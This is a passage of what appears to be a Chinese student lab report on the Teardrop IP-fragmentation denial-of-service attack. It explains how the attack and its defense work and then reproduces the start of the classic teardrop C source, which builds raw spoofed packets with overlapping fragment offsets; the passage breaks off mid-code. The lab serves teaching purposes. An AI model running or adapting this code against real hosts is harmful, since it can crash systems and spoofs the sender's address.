实验目的:
完成Teardrop代码编程,伪造一个虚假地址的IP包,包的内容填入Fake News,发送此包,并用wireshark抓包进行验证。
实验环境:
- Ubuntu18.04
- C语言
一、了解Teardrop攻击
攻击原理:
攻击者A给受害者B发送一些分片IP报文,并且故意将“13位分片偏移”字段设置成错误的值(既可与上一分片数据重叠,也可错开),B在组合这种含有重叠偏移的伪造分片报文时,会导致系统崩溃。
当对一台机器发动泪滴攻击时,该机器就会崩溃或重启。 (在Windows机器上,用户可能会遇到蓝屏死机)。 如果你正确防御了Winnuke和SSping的 DoS攻击,但仍然发生崩溃,那么极有可能受到泪滴攻击或LAND攻击。
防御方法:
网络安全设备将接收到的分片报文先放入缓存中,并根据源IP地址和目的IP地址对报文进行分组,源IP地址和目的IP地址均相同的报文归入同一组,然后对每组IP报文的相关分片信息进行检查,丢弃分片信息存在错误的报文。为了防止缓存益处,当缓存快要存满是,直接丢弃后续分片报文。
二、虚拟机及环境
打开虚拟机前设置桥接模式
先打开[设置]
勾选[桥接模式]
三、相关代码
c程序代码:创建一个虚假ip包
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <errno.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n) (n)
#else
/* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define PADDING 0x1c /* datagram frame padding for first packet */
#define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */
#define COUNT 0x1
/* Linux dies with 1, NT is more stalwart and can
* withstand maybe 5 or 10 sometimes... Experiment.
*/
//错误处理函数
void usage(u_char *);
//获取主机信息
u_long name_resolve(u_char *);
//设置 IP 包的内容并发送
void send_frags(int ,u_long,u_long,u_short,u_short);
//主函数
int main(int argc,char **argv)
{
int one = 1, count = 0, i, rip_sock;
//定义无符号长整型源 IP 和目的 IP
u_long src_ip = 0, dst_ip = 0;
//定义无符号短整型源端口号和目的端口号
u_short src_prt = 0, dst_prt = 0;
/*
定一个结构体 in_addr(表示一个32位的IPv4地址)的一个对象
struct in_addr
{
union
{
struct
{
u_char s_b1,s_b2,s_b3,s_b4;
} S_un_b; //An IPv4 address formatted as four u_chars.
struct
{
u_short s_w1,s_w2;
} S_un_w; //An IPv4 address formatted as two u_shorts
u_long S_addr;//An IPv4 address formatted as a u_long
} S_un;
#define s_addr S_un.S_addr
};
*/
struct in_addr addr;
printf("teardrop route|daemon9\n\n");
/*
创建一个原始套接字
AF_INET——IPv4地址;
SOCK_RAW——原始的套接字类型
IPPROTO_RAW——允许使用底层的套接字协议,就可以自己编写IP包
如果创建套接字成功,则会返回一个描述符(int型),失败则会返回 INVALID_SOCKET
每个电脑里面都会有一个描述符表,对应套接字
如果创建失败,将错误消息输出到屏幕
然后退出程序
*/
if((rip_sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) < 0)
{
fprintf(stderr,"raw socket");
exit(1);
}
/*
设置原始套接字选项 IP_HDRINCL
如果不设置这个选项,IP 协议会自动填充 IP 数据包的首部
这个情况是我们所不需要的,我们需要自己编写 IP 包
*/
if(setsockopt(rip_sock,IPPROTO_IP,IP_HDRINCL,(char *)&one